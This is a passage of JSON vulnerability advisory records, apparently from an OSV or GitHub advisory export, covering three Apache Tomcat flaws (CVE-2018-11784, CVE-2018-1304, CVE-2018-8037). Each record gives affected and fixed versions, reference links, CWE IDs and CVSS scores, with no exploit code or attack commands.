"8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-5q99-f34m-67gc/GHSA-5q99-f34m-67gc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.23" }, { "fixed": "7.0.91" } ] } ], "versions": [ "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-5q99-f34m-67gc/GHSA-5q99-f34m-67gc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.12" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-5q99-f34m-67gc/GHSA-5q99-f34m-67gc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11784" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b76e1dfb3dec3789cc700f8d022c872eb947a221" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/efb860b3ff8ebcf606199b8d0d432f76898040da" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f9f147359b7c95511b64cd99bbc47917c01b3879" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/10/msg00005.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0130" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/10/msg00006.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BZ4PX4B3QTKRM35VJAVIEOPZAF76RPBP" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BZ4PX4B3QTKRM35VJAVIEOPZAF76RPBP" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0002" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3787-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030058/http://www.securityfocus.com/bid/105524" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0131" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0485" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1529" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-5q99-f34m-67gc" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10284" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00030.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00056.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/163456/Apache-Tomcat-9.0.0M1-Open-Redirect.html" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:17:07Z", "nvd_published_at": "2018-10-04T13:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6rxj-58jh-436r", "published": "2018-10-17T16:31:17Z", "modified": "2024-11-29T05:39:06.932138Z", "aliases": [ "CVE-2018-1304" ], "summary": "Apache Tomcat unauthorized access vulnerability", "details": "The URL pattern of \"\" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.5" } ] } ], "versions": [ "9.0.1", "9.0.2", "9.0.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6rxj-58jh-436r/GHSA-6rxj-58jh-436r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.28" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6rxj-58jh-436r/GHSA-6rxj-58jh-436r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.0.51" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.8", "8.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6rxj-58jh-436r/GHSA-6rxj-58jh-436r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.86" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6rxj-58jh-436r/GHSA-6rxj-58jh-436r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1304" }, { "type": "WEB", "url": "https://github.com/apache/tomcat80/commit/9e700b93e3bf5c605267d20568a964169f9e0b79" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/723ea6a5bc5e7bc49e5ef84273c3b3c164a6a4fd" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/5af7c13cff7cc8366c5997418e820989fabb8f48" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2d69fde135302e8cff984bb2131ec69f2e396964" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b1d7e2425d6fd2cebed40d318f9365b44546077e10949b01b1f8a0fb@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00004.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/06/msg00008.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00044.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180706-0001" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3665-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227102806/http://www.securityfocus.com/bid/103170" }, { "type": "WEB", "url": "https://web.archive.org/web/20200516074457/http://www.securitytracker.com/id/1040427" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4281" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0465" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0466" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1320" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1447" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1448" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1449" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2939" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2205" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-6rxj-58jh-436r" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b1d7e2425d6fd2cebed40d318f9365b44546077e10949b01b1f8a0fb%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:20:10Z", "nvd_published_at": "2018-02-28T20:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6v52-mj5r-7j2m", "published": "2018-10-17T16:33:02Z", "modified": "2024-03-11T05:32:05.311159Z", "aliases": [ "CVE-2018-8037" ], "summary": "Apache Tomcat Race Condition vulnerability", "details": "If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could result in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. This could also result in a user seeing a response intended for another user. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.9 and 8.5.5 to 8.5.31.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M9" }, { "fixed": "9.0.10" } ] } ], "versions": [ "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M9", "9.0.1", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6v52-mj5r-7j2m/GHSA-6v52-mj5r-7j2m.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.5" }, { "fixed": "8.5.32" } ] } ], "versions": [ "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.30", "8.5.31", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6v52-mj5r-7j2m/GHSA-6v52-mj5r-7j2m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8037" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4c04369c287233ea2e8e5135f6c31d02e2d76293" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ccf2e6bf5205561ad18c2300153e9173ec509d73" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ed4b9d791f9470e4c3de691dd0153a9ce431701b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f94eedf02b5973598ab3dbbd4504da588e9ba6cb" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2867" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180817-0001" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227102808/http://www.securityfocus.com/bid/104894" }, { "type": "WEB", "url": "https://web.archive.org/web/20200515223903/http://www.securitytracker.com/id/1041376" }, { "type": "WEB", "url": 